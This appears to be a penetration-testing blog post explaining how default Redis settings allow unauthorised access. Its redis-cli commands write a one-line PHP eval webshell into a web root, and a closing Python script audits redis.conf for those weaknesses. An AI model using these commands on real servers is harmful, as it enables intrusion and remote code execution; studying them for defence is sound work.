Redis For Webshell

2019-08-14  RabbitMask

Security (unauthorized access)

As already mentioned in 《Redis初步》 (Redis Basics), redis sets no password by default. Let's go through the default conf file to see what its out-of-the-box security looks like.

First, the password: none is set by default; it has to be specified manually with requirepass password. Note that if you use a custom conf file but start redis-server without pointing it at that configuration file, the setting likewise does not take effect.

# Require clients to issue AUTH <PASSWORD> before processing any other
# commands.  This might be useful in environments in which you do not trust
# others with access to the host running redis-server.
#
# This should stay commented out for backward compatibility and because most
# people do not need auth (e.g. they run their own servers).
# 
# Warning: since Redis is pretty fast an outside user can try up to
# 150k passwords per second against a good box. This means that you should
# use a very strong password otherwise it will be very easy to break.
#
# requirepass foobared

Next, the access policy: by default it is wide open, listening on 0.0.0.0.

# By default Redis listens for connections from all the network interfaces
# available on the server. It is possible to listen to just one or multiple
# interfaces using the "bind" configuration directive, followed by one or
# more IP addresses.
#
# Examples:
#
# bind 192.168.1.100 10.0.0.1
# bind 127.0.0.1

These two points are the root cause of the widely discussed redis unauthorized-access vulnerability. Does it count as a vulnerability? I suppose so, yet every piece of it is also perfectly reasonable on its own.

Write permission (Get Webshell)

Continuing through the config file, dbfilename is the name of the dumped file. It naturally defaults to an rdb file, i.e. the storage file produced by a save operation.

# The filename where to dump the DB
dbfilename dump.rdb

dir is the "working directory", that is, the location where the storage file mentioned above is saved. It defaults to the redis root directory, and setting it to a custom absolute path is of course entirely feasible.

# The working directory.
#
# The DB will be written inside this directory, with the filename specified
# above using the 'dbfilename' configuration directive.
# 
# The Append Only File will also be created inside this directory.
# 
# Note that you must specify a directory here, not a file name.
dir ./

Finally, redis has one more mechanism: the parameters above can be set from the console at runtime with the config command. This does not modify the conf file and only applies to the running instance (it is lost when redis restarts), but precisely because of this mechanism, a config set takes effect without restarting redis at all. Enough preamble, let's begin~

#redis-cli
192.168.1.254:6379> config set dir D:\Software\Phpstudy\PHPTutorial\WWW\DVWA
OK
192.168.1.254:6379> config set dbfilename rabbit.php
OK
192.168.1.254:6379> set webshell "<?php eval(@$_POST['a']);?>"
OK
192.168.1.254:6379> save
OK

#redis-server
[20424] 14 Aug 14:21:54.207 * DB saved on disk

The file is successfully generated in the specified directory (screenshot):

It is parsed normally by PHP, getshell success (screenshot):
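The whole chain above rests on three conf settings: requirepass missing, bind unrestricted, and CONFIG still reachable so that dir and dbfilename can be changed live. The following Python script is an added example (not from this post) that audits a redis.conf for exactly those three conditions; the two sample configs are constructed, and the rename-command / protected-mode directives are standard redis.conf options assumed to be available on the version being audited.

```python
"""Audit a redis.conf for the settings this post abuses: requirepass, bind, CONFIG."""

# Constructed sample: the stock defaults quoted in the post (auth and bind commented out)
DEFAULT_CONF = """\
# requirepass foobared
# bind 127.0.0.1
dbfilename dump.rdb
dir ./
"""

# Constructed sample: the same file hardened (password is a placeholder, not a real one)
HARDENED_CONF = """\
bind 127.0.0.1
protected-mode yes
requirepass REPLACE_WITH_A_LONG_RANDOM_PASSWORD
rename-command CONFIG ""
dbfilename dump.rdb
dir /var/lib/redis
"""


def parse_conf(text):
    """Return {directive: [values]} for active lines; commented-out lines are ignored."""
    active = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        active.setdefault(parts[0].lower(), []).append(parts[1] if len(parts) > 1 else "")
    return active


def audit_redis_conf(text):
    """Return a list of findings; an empty list means none of the three weak spots is present."""
    conf = parse_conf(text)
    findings = []
    if "requirepass" not in conf:
        findings.append("no requirepass: every client that reaches the port is fully authorised")
    binds = conf.get("bind", [])
    if not binds or any(tok in ("0.0.0.0", "*") for b in binds for tok in b.split()):
        findings.append("bind unrestricted: redis listens on every interface")
    renamed = [v for v in conf.get("rename-command", []) if v.split()[0].upper() == "CONFIG"]
    if not renamed:
        findings.append("CONFIG reachable: dir/dbfilename can be rewritten at runtime")
    if conf.get("protected-mode", ["yes"])[-1].lower() == "no":
        findings.append("protected-mode no: loopback-only safety net disabled")
    return findings
```

Running audit_redis_conf on DEFAULT_CONF reports three findings; on HARDENED_CONF it reports none.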
